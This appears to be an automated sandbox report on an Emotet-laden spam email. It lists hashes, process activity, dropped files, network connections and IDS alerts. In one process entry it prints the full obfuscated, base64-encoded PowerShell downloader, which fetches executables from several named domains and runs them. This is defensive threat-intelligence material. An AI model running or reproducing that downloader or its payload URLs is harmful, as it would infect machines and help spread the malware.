File name: | SPAM .msg |
Full analysis: | https://app.any.run/tasks/cf79713d-0a96-4812-9371-362a21f9bf95 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 20, 2020, 02:09:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | BF0D6BBD7CE6F76FC80ADA39DB2A3494 |
SHA1: | 0A5B637FD9B9DEE54594ED5D5CB2D5A06956A4A1 |
SHA256: | B161FE4F8DB06FD9C3D49EADD5958680CC2CAAC2E0BAFF083ABB2C32D24A252E |
SSDEEP: | 1536:xF9j1U3+q7CU2RCvq6W1wsQrvAY/J03CgZS+9AByUwohnSIGwJ6qwdxR:Pe7CZRCvW1xyIYh0SwAByToVSL1d |
.msg | | | Outlook Message (58.9) |
---|---|---|
.oft | | | Outlook Form Template (34.4) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2472 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\SPAM .msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
3772 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\SGQSNULX\Electronic form.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | OUTLOOK.EXE |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3448 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3772.11050\Electronic form.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3392 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
860 | POwersheLL -ENCOD JABEAFAAOQAxACAAIAA9AFsAdAB5AHAARQBdACgAJwBzAHkAcwBUAGUAbQAuAEkAJwArACcAbwAuAEQASQByAGUAJwArACcAYwB0ACcAKwAnAG8AJwArACcAcgBZACcAKQA7ACAAIABzAEUAdAAtAGkAVABlAE0AIAAgAFYAYQBSAEkAQQBiAGwARQA6AEcANwAwACAAKAAgAFsAdABZAHAARQBdACgAJwBTAFkAcwAnACsAJwB0AGUATQAuAE4AJwArACcAZQBUAC4AcwBlAFIAVgBJAEMAJwArACcAZQBQACcAKwAnAG8ASQAnACsAJwBuAFQAbQBhACcAKwAnAG4AQQBHACcAKwAnAGUAJwArACcAUgAnACkAKQA7ACAAIAAgAFMARQBUACAAKAAiAEgAIgArACIAYgBKAGMATAA2ACIAKQAgACAAKAAgAFsAVAB5AFAAZQBdACgAJwBTAFkAUwBUACcAKwAnAGUAbQAuAE4AJwArACcARQAnACsAJwBUAC4AcwBlACcAKwAnAGMAJwArACcAdQBSAGkAVAB5AFAAcgBPAHQAbwAnACsAJwBDAE8AJwArACcATAB0AFkAUABFACcAKQApACAAOwAgACAAJABKADQAaQA0AHEAaQA1AD0AKAAnAE0AJwArACcAZwBkAGMAaABvAHoAJwApADsAJABFADUAMQBzAGQANAB2AD0AJABOADAAcwA0AGkAOABwACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQATQBrAGYAaQBmAGsAbQA7ACQASAB2AGUAbAB1ADQAcAA9ACgAJwBVAHMAcAAnACsAJwB2AHUAcQBmACcAKQA7ACAAKAAgAFYAQQByAGkAQQBiAGwAZQAgAGQAcAA5ADEAIAAtAHYAQQBsAHUAIAAgACkAOgA6AEMAUgBFAGEAdABlAEQASQBSAGUAYwB0AE8AcgBZACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAJwB4AHQAOAAnACsAJwBBAHcAdgA4ADMAeAB0AHgAdAA4ACcAKwAnAFUAJwArACcAMwBmADYAaQBvAHQAeAAnACsAJwB0ADgAJwApACAALQBjAHIAZQBwAGwAQQBDAEUAIAAnAHgAdAA4ACcALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADMAbQBqADgAMgA3AD0AKAAnAEoANQBsACcAKwAnAGcAZAB2ADkAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABJAFQARQBNACAAIAB2AGEAcgBpAEEAQgBMAGUAOgBHADcAMAAgACAAKQAuAFYAQQBMAHUARQA6ADoAUwBFAEMAdQByAGkAdABZAFAAcgBPAFQAbwBjAE8AbAAgAD0AIAAgACgAIAB2AGEAUgBJAEEAYgBMAGUAIAAgACgAIgBoACIAKwAiAEIAagBDAEwANgAiACkAIAAtAFYAQQBMAHUARQBvACAAKQA6ADoAVABsAHMAMQAyADsAJABWAGwANAB3AGoAbgA1AD0AKAAnAE8AJwArACcAMQBhADIAJwArACcAcwA1ADcAJwApADsAJABCAGEAeAA5AGEAbABmACAAPQAgACgAJwBEADIAZQBuADAAJwArACcAZAAnACkAOwAkAE8AMQB5ADkAMgBzAGoAPQAoACcARgAnACsAJwB1AGoAJwArACcAMgBpAHkAdAAnACkAOwAkAFQAMAB4AHoAaAAxAGYAPQAoACcATwA5AGoAYQBtACcAKwAnAHIAdQAnACkAOwAkAEUAZAA1AHMAcAA1ADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0AJwArACcAQQB3AHYAOAAzACcAKwAnAHgAdAAnACsAJwB7ADAAfQAnACsAJwBVADMAZgA2ACcAKwAnAGkAbwB0ACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBmAFsAQwBIAGEAUgBdADkAMgApACsAJABCAGEAeAA5AGEAbABmACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABUAHAAagA4AHcAcQBkAD0AKAAnAEgAYQA0ACcAKwAnAGcAaQBkAHgAJwApADsAJABHAHkAdQBtADkAYwA4AD0ATgBlAGAAdwBgAC0ATwBiAGAAagBlAEMAVAAgAG4ARQB0AC4AVwBFAEIAQwBsAGkARQBuAHQAOwAkAFkAZwAwAGwANABkAGYAPQAoACcAaAB0AHQAJwArACcAcAAnACsAJwBzADoALwAnACsAJwAvAGEAJwArACcAcgBpAGYAJwArACcAdQBsAGgAdQBxACcAKwAnAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAALQAnACsAJwBpAG4AJwArACcAYwBsAHUAZABlAHMALwB1AGMAVgAnACsAJwA4ACcAKwAnAC8AKgAnACsAJwBoAHQAdABwAHMAOgAvAC8AdABoACcAKwAnAGUAJwArACcAdQAnACsAJwBzAG0AYQBuAHMAYQAnACsAJwBpAGYALgBjAG8AbQAvACcAKwAnAHcAJwArACcAcAAvACcAKwAnAGUAVgBpAG4AJwArACcAYwAnACsAJwAvACoAaAAnACsAJwB0ACcAKwAnAHQAcABzACcAKwAnADoALwAvAGcAcgBlAGUAJwArACcAbgBsAGEAbgBkACcAKwAnAGwAJwArACcAaQAnACsAJwBvAG4AJwArACcALgAnACsAJwBjAG8AbQAvAHcAcAAtAGMAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQALwAnACsAJwBDAC8AKgBoAHQAJwArACcAdABwACcAKwAnAHMAJwArACcAOgAvACcAKwAnAC8AdwAnACsAJwBlAGIAYwBsAGkAZQAnACsAJwBuAHQAJwArACcAdwAnACsAJwBvACcAKwAnAHIAawBzACcAKwAnAC4AJwArACcAeAB5AHoALwBmAGwAJwArACcAbwAnACsAJwByAGkAZAAnACsAJwBhAC8AdQA3AGEASgAvACcAKwAnACoAJwArACcAaAB0AHQAJwArACcAcAAnACsAJwBzADoALwAnACsAJwAvAGgAZAAuAHkAYQBtAGEAJwArACcAcgBpAG4AawBvAHUAJwArACcALgBqAHAALwBiAGwAbwBnAHMALwAnACsAJwA5ACcAKwAnADcAdwBTAHcARgBiAC8AKgBoAHQAdABwADoALwAnACsAJwAvAGwAZQBnACcAKwAnAGEAbAAnACsAJwBlAG0AJwArACcAcABvAHcAZQByACcAKwAnAG0AZQBuAHQAJwArACcAaQBuACcAKwAnAGQAaQAnACsAJwBhACcAKwAnAC4AYwBvAG0ALwAnACsAJwBjAGcAJwArACcAaQAnACsAJwAtAGIAaQAnACsAJwBuAC8AJwArACcAOQBaADYATAAnACsAJwAvACoAaAB0ACcAKwAnAHQAJwArACcAcAAnACsAJwA6AC8ALwAnACsAJwBkAGgAYQAnACsAJwByAGEAbQAnACsAJwBwAGEAbAAuAG4AZQB0ACcAKwAnAC8AcABhACcAKwAnAHIAZQAnACsAJwBuAHQALwBMACcAKwAnAE4AbgBiAEIALwAqACcAKwAnAGgAdAB0AHAAcwA6AC8AJwArACcALwB6AGkAaQBsAC4AZQB1ACcAKwAnAC8AYwBnAGkALQBiACcAKwAnAGkAJwArACcAbgAvACcAKwAnAEoATgB6AEkAJwArACcALwAnACkALgBTAFAAbABpAHQAKAAkAFAAdwBvAHAAbABvAHkAIAArACAAJABFADUAMQBzAGQANAB2ACAAKwAgACQATwAxAG8ANABpAGkAbQApADsAJABaAGIAMAA0AG8AdwB0AD0AKAAnAFcAcABvAGgAJwArACcAOQAnACsAJwAwADIAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLAHcAMwBrADcAOAA3ACAAaQBuACAAJABZAGcAMABsADQAZABmACkAewB0AHIAeQB7ACQARwB5AHUAbQA5AGMAOAAuAGQATwBXAG4ATABvAEEARABGAEkAbABlACgAJABLAHcAMwBrADcAOAA3ACwAIAAkAEUAZAA1AHMAcAA1ADUAKQA7ACQASAA3AHAAMQBjAGYAOAA9ACgAJwBUAHEAbgA3AGMAJwArACcAawBhACcAKQA7AEkAZgAgACgAKABHAEUAVAAtAGAASQBUAGAAZQBNACAAJABFAGQANQBzAHAANQA1ACkALgBsAGUAbgBHAFQAaAAgAC0AZwBlACAAMgA0ADgAMQAyACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwBpACcAKwAnAG4AJwArACcAMwAnACsAJwAyAF8AUAByACcAKwAnAG8AYwBlAHMAcwAnACkAKQAuAEMAcgBlAGEAVABFACgAJABFAGQANQBzAHAANQA1ACkAOwAkAEIAaABoAGUANQBfAF8APQAoACcAQwB2ADgAXwByADgAJwArACcAdwAnACkAOwBiAHIAZQBhAGsAOwAkAFkAcwBtADUAdwB5ADYAPQAoACcAUABiACcAKwAnADAAagB4AGkAdgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAdAA2ADMAdQBsAHEAPQAoACcASwB4ACcAKwAnAF8AJwArACcAdgBfAG8AawAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3172 | C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe | C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3096 | "C:\Users\admin\AppData\Local\wmploc\tsdiscon.exe" | C:\Users\admin\AppData\Local\wmploc\tsdiscon.exe | — | D2en0d.exe |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR4105.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\SGQSNULX\Electronic form (2).zip\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3448 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4508.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3448 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_034F30A8-8AEC-4237-8140-2802BBE96F06.0\14F9C305.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\outlook logging\firstrun.log | text | |
MD5:C0A6A734CD50CB4AC52DE64D86912C07 | SHA256:148E72A3CF19942547B68C14EF1AF62023A159C135AAA3DDD3EB0DD2609B1A08 | |||
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:E29F98FB2585C381FC9F6BA016841AF8 | SHA256:8E889158497CA2EC80A0EF159102790AB692EE06ED96151CB1B46E4F529C2D51 | |||
3448 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_034F30A8-8AEC-4237-8140-2802BBE96F06.0\14F9C305.doc | document | |
MD5:6FBCFA378463859E57D49FA5CDE459E6 | SHA256:5EFA8EA16D3A6F6CF7809B90FCA93BE1C0D98F516BC7D715C282C726B545E952 | |||
3772 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb3772.11050\Electronic form.doc | document | |
MD5:6FBCFA378463859E57D49FA5CDE459E6 | SHA256:5EFA8EA16D3A6F6CF7809B90FCA93BE1C0D98F516BC7D715C282C726B545E952 | |||
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_ContactPrefs_2_BD3811C31EB3E5478AD17D06CE92DE4D.dat | xml | |
MD5:BBCF400BD7AE536EB03054021D6A6398 | SHA256:383020065C1F31F4FB09F448599A6D5E532C390AF4E5B8AF0771FE17A23222AD | |||
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\SGQSNULX\Electronic form.zip | compressed | |
MD5:BC26B98DAD034334D4F2F642F8A7F5BC | SHA256:1184BA6D6D9CF011CFF380F25C84F426F014D0E9B5196000B55C9A792EBC9EC2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2472 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
860 | POwersheLL.exe | GET | 200 | 202.66.172.245:80 | http://legalempowermentindia.com/cgi-bin/9Z6L/ | IN | executable | 596 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
860 | POwersheLL.exe | 104.31.76.228:443 | greenlandlion.com | Cloudflare Inc | US | shared |
2472 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
860 | POwersheLL.exe | 163.43.94.66:443 | hd.yamarinkou.jp | SAKURA Internet Inc. | JP | unknown |
860 | POwersheLL.exe | 94.130.88.157:443 | arifulhuq.com | Hetzner Online GmbH | DE | unknown |
860 | POwersheLL.exe | 148.72.118.97:443 | webclientworks.xyz | — | US | unknown |
860 | POwersheLL.exe | 198.37.123.126:443 | theusmansaif.com | DC74 LLC | US | malicious |
860 | POwersheLL.exe | 202.66.172.245:80 | legalempowermentindia.com | ZNet Cloud Services | IN | suspicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
arifulhuq.com |
| suspicious |
theusmansaif.com |
| malicious |
greenlandlion.com |
| unknown |
webclientworks.xyz |
| unknown |
hd.yamarinkou.jp |
| unknown |
legalempowermentindia.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
860 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
860 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
860 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
860 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
860 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
860 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
860 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |